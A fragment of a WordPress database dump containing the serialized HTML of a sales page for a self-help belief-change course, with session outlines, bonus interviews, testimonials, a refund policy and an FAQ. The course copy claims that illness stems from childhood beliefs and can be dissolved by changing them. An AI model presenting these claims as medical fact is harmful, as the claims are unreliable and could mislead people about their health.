beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>” \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it’s so difficult to change your habitual patterns of thought and behavior. \n\nIt’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<a name="package"></a>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You’ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\n<div style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb-purch">\n\n&nbsp;\n\n<a href="https://beliefcloset.infusionsoft.com/app/orderForms/1101aa80-782e-4650-acb8-2f1ae88e2cbd"><button class="btn first" style="padding: 10px 20px;">Purchase</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n<strong>Q: What is a virtual course?</strong>\n\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\n\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\n\n<strong>Q: How long will I have access to the course?</strong>\n\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\n\n<strong>Q: Are there scholarships available?</strong>\n\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\n\n<strong>Q: What is your refund policy?</strong>\n\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1554, 2007, '_wp_attached_file', '2014/12/cb.png'),
